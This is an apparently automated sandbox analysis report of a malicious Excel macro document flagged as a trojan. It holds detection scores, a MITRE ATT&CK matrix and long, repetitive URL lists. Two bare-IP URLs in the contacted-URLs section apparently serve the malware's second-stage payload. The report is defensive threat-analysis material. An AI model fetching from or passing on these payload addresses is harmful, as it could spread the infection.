      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting32Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting32LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Extra Window Memory Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      9177284661-04302021.xlsm39%VirustotalBrowse
      9177284661-04302021.xlsm32%ReversingLabsDocument-Office.Trojan.Valyria

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
      https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
      http://45.144.31.232/44313,6048108796.dat8%VirustotalBrowse
      http://45.144.31.232/44313,6048108796.dat0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%VirustotalBrowse
      https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://dataservice.o365filtering.com/0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://apis.live.net/v5.0/0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
      https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
      http://185.45.193.80/44313,6048108796.dat0%Avira URL Cloudsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://ncus.pagecontentsync.0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://skyapi.live.net/Activity/0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://dataservice.o365filtering.com0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://api.cortana.ai0%URL Reputationsafe
      https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
      https://directory.services.0%URL Reputationsafe
      https://directory.services.0%URL Reputationsafe
      https://directory.services.0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://45.144.31.232/44313,6048108796.dattrue
      • 8%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://185.45.193.80/44313,6048108796.datfalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
        		high
        https://login.microsoftonline.com/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
          		high
          https://shell.suite.office.com:1443F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
            		high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
              		high
              https://autodiscover-s.outlook.com/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                		high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                  		high
                  https://cdn.entity.F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://api.addins.omex.office.net/appinfo/queryF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                    		high
                    https://clients.config.office.net/user/v1.0/tenantassociationkeyF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                      		high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                        		high
                        https://powerlift.acompli.netF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://lookup.onenote.com/lookup/geolocation/v1F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                          		high
                          https://cortana.aiF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                            		high
                            https://cloudfiles.onenote.com/upload.aspxF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                              		high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                		high
                                https://entitlement.diagnosticssdf.office.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                  		high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                    		high
                                    https://api.aadrm.com/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                      		high
                                      https://api.microsoftstream.com/api/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                        		high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                          		high
                                          https://cr.office.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                            		high
                                            https://portal.office.com/account/?ref=ClientMeControlF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                              		high
                                              https://ecs.office.com/config/v2/OfficeF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                		high
                                                https://graph.ppe.windows.netF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                  		high
                                                  https://res.getmicrosoftkey.com/api/redemptioneventsF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://powerlift-frontdesk.acompli.netF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://tasks.office.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                    		high
                                                    https://officeci.azurewebsites.net/api/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/workF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                      		high
                                                      https://store.office.cn/addinstemplateF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                        		high
                                                        https://globaldisco.crm.dynamics.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                          		high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                            		high
                                                            https://store.officeppe.com/addinstemplateF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://dev0-api.acompli.net/autodetectF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.odwebp.svc.msF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://api.powerbi.com/v1.0/myorg/groupsF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                              		high
                                                              https://web.microsoftstream.com/video/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                		high
                                                                https://graph.windows.netF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                  		high
                                                                  https://dataservice.o365filtering.com/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://officesetup.getmicrosoftkey.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://analysis.windows.net/powerbi/apiF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                    		high
                                                                    https://prod-global-autodetect.acompli.net/autodetectF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://outlook.office365.com/autodiscover/autodiscover.jsonF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                      		high
                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                        		high
                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                          		high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                            		high
                                                                            https://ncus.contentsync.F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                              		high
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                		high
                                                                                http://weather.service.msn.com/data.aspxF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                  		high
                                                                                  https://apis.live.net/v5.0/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                    		high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                      		high
                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                        		high
                                                                                        https://management.azure.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                          		high
                                                                                          https://wus2.contentsync.F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://incidents.diagnostics.office.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                            		high
                                                                                            https://clients.config.office.net/user/v1.0/iosF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                              		high
                                                                                              https://insertmedia.bing.office.net/odc/insertmediaF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                		high
                                                                                                https://o365auditrealtimeingestion.manage.office.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                  		high
                                                                                                  https://outlook.office365.com/api/v1.0/me/ActivitiesF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                    		high
                                                                                                    https://api.office.netF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                      		high
                                                                                                      https://incidents.diagnosticssdf.office.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                        		high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                        • 0%, Virustotal, Browse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policiesF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                          		high
                                                                                                          https://entitlement.diagnostics.office.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                            		high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                              		high
                                                                                                              https://outlook.office.com/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                		high
                                                                                                                https://storage.live.com/clientlogs/uploadlocationF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                  		high
                                                                                                                  https://templatelogging.office.com/client/logF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                    		high
                                                                                                                    https://outlook.office365.com/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                      		high
                                                                                                                      https://webshell.suite.office.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                        		high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                          		high
                                                                                                                          https://management.azure.com/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                            		high
                                                                                                                            https://login.windows.net/common/oauth2/authorizeF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                              		high
                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
